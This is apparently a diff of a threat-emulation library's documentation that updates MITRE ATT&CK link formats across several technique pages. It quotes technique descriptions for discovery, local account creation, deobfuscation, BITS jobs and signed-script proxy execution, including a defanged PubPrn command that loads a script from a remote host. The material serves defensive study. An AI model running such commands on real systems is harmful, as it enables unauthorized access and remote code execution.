 Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
@@ -1,5 +1,5 @@
 # T1135 - Network Share Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1135)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1135)
 <blockquote>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 

 File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>.
@@ -1,5 +1,5 @@
 # T1136.001 - Local Account
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1136.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1136/001)
 <blockquote>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the <code>net user /add</code> command can be used to create a local account.

 Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</blockquote>
@@ -1,5 +1,5 @@
 # T1140 - Deobfuscate/Decode Files or Information
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1140)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1140)
 <blockquote>Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

 One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
@@ -1,5 +1,5 @@
 # T1176 - Browser Extensions
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1176)
 <blockquote>Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition)

 Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
@@ -1,5 +1,5 @@
 # T1197 - BITS Jobs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1197)
 <blockquote>Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

 The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001)  (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)
@@ -1,5 +1,5 @@
 # T1201 - Password Policy Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1201)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1201)
 <blockquote>Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).

 Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code>.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)</blockquote>
@@ -1,5 +1,5 @@
 # T1202 - Indirect Command Execution
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1202)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1202)
 <blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)

 Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</blockquote>
@@ -1,5 +1,5 @@
 # T1204.002 - Malicious File
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1204.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1204/002)
 <blockquote>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

 Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.
@@ -1,5 +1,5 @@
 # T1207 - Rogue Domain Controller
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1207)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1207)
 <blockquote>Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

 Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
@@ -1,5 +1,5 @@
 # T1216.001 - PubPrn
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1216/001)
 <blockquote>Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.

 <code>PubPrn.vbs</code> is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is <code>cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>.</blockquote>
@@ -1,5 +1,5 @@
 # T1216 - Signed Script Proxy Execution
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1216)
 <blockquote>Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1217 - Browser Bookmark Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1217)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1217)
 <blockquote>Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

 Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.
@@ -1,5 +1,5 @@
 # T1218.001 - Compiled HTML File
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/001)
 <blockquote>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

 A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</blockquote>
@@ -1,5 +1,5 @@
 # T1218.002 - Control Panel
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/002)
 <blockquote>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)

 For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
--- a/Show More
+++ b/Show More